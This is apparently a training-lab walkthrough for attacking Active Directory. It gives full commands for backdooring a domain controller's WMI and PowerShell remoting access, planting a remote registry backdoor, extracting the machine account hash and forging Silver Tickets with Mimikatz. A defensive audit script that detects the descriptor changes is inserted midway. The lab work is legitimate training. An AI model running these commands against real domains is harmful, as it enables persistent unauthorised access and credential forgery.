Obj 13 Security Descriptors
Task - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. Retrieve the machine account hash from dcorp-dc and use it for a Silver Ticket.
Once we have administrative privileges on a machine, we can modify the security descriptors of services so that the services can be accessed later without administrative privileges. The command below (to be run as Domain Administrator) modifies the host security descriptors for WMI on the DC to allow studentx access to WMI:
Start a new session, run InviShell, and load RACE.ps1:
. C:\AD\Tools\RACE.ps1
Set-RemoteWMI -SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose
Now, we can execute WMI queries on the DC as studentx:
PS C:\AD\Tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local
A similar modification can be made to the PowerShell remoting configuration. (In rare cases you may get an I/O error while running the command below; ignore it.) Note that this has been unstable since some patches in August 2020:
Enable PSRemoting on the DC from the student VM:
Set-RemotePSRemoting -SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
We can now run commands using PowerShell remoting on the DC without DA privileges:
Invoke-Command -ScriptBlock {whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
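As an added defensive check (not part of the lab or of RACE.ps1), the following PowerShell audit lists trustees beyond a stock Windows baseline that hold remote-enable rights on a WMI namespace or appear in a PowerShell remoting session configuration's ACL, which is exactly what the two Set-Remote* commands above change. The default-trustee lists are an assumption for an unmodified Windows Server, and the script assumes it is run locally on the host being checked (e.g. the DC) from an elevated session.

```powershell
# Added defender-side audit, not part of RACE.ps1 or the lab: reports principals that hold
# remote-enable rights on a WMI namespace, or appear in a PowerShell remoting session
# configuration's ACL, beyond the trustees Windows grants by default. Run locally on the
# host being checked (e.g. dcorp-dc) from an elevated PowerShell session.
# The "default trustee" lists below are an assumption for a stock Windows Server; adjust
# them to your own baseline.

$WBEM_REMOTE_ACCESS = 0x20   # WMI namespace right that allows remote (DCOM) connections
$ACE_TYPE_ALLOW     = 0      # Win32_ACE.AceType value for an access-allowed ACE

# Trustees present in a default root\cimv2 DACL and in default session configurations.
$DefaultWmiTrustees = @('Administrators', 'Authenticated Users', 'LOCAL SERVICE', 'NETWORK SERVICE')
$DefaultPsrTrustees = @('NT AUTHORITY\INTERACTIVE', 'BUILTIN\Administrators', 'BUILTIN\Remote Management Users')

function Get-UnexpectedWmiRemoteAccess {
    param([string]$Namespace = 'root\cimv2')
    # __SystemSecurity is the singleton that exposes the namespace's security descriptor.
    $sec = Get-CimInstance -Namespace $Namespace -ClassName __SystemSecurity
    $sd  = (Invoke-CimMethod -InputObject $sec -MethodName GetSecurityDescriptor).Descriptor
    foreach ($ace in $sd.DACL) {
        $isAllow  = $ace.AceType -eq $ACE_TYPE_ALLOW
        $isRemote = ($ace.AccessMask -band $WBEM_REMOTE_ACCESS) -ne 0
        if ($isAllow -and $isRemote -and $ace.Trustee.Name -notin $DefaultWmiTrustees) {
            [pscustomobject]@{
                Check      = 'WMI'
                Target     = $Namespace
                Trustee    = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
                SID        = $ace.Trustee.SIDString
                AccessMask = '0x{0:X}' -f $ace.AccessMask
            }
        }
    }
}

function Get-UnexpectedPSRemotingAccess {
    foreach ($cfg in Get-PSSessionConfiguration) {
        # Permission is a string such as "BUILTIN\Administrators AccessAllowed, ..."
        foreach ($entry in ($cfg.Permission -split ',\s*')) {
            if ($entry -match '^(?<trustee>.+?)\s+(?<access>AccessAllowed|AccessDenied)$') {
                $t = $Matches.trustee
                if ($Matches.access -eq 'AccessAllowed' -and $t -notin $DefaultPsrTrustees) {
                    [pscustomobject]@{ Check='PSRemoting'; Target=$cfg.Name; Trustee=$t; SID=$null; AccessMask=$Matches.access }
                }
            }
        }
    }
}

Get-UnexpectedWmiRemoteAccess -Namespace 'root\cimv2'
Get-UnexpectedPSRemotingAccess
```

After the lab's Set-RemoteWMI and Set-RemotePSRemoting have run, the studentx account shows up in both result sets; on a clean host the script returns nothing.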
Retrieve machine account hash without DA
We first need to modify permissions on the DC to allow this. Start a new session as DA and load the RACE.ps1 script as shown above.
Add RemoteRegBackdoor to the DC:
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee studentx -Verbose
Now, from the student session, we can retrieve the machine account hash to use later:
. C:\AD\Tools\RACE.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
We can use the machine account hash to create Silver Tickets. Create Silver Tickets for HOST and RPCSS using the machine account hash to execute WMI queries.
Create a Silver Ticket for HOST on the DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt"'
Create a Silver Ticket for RPCSS on the DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt"'
Check that the tickets were injected:
klist
Now we can run WMI queries on the DC:
PS C:\AD\Tools> gwmi -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local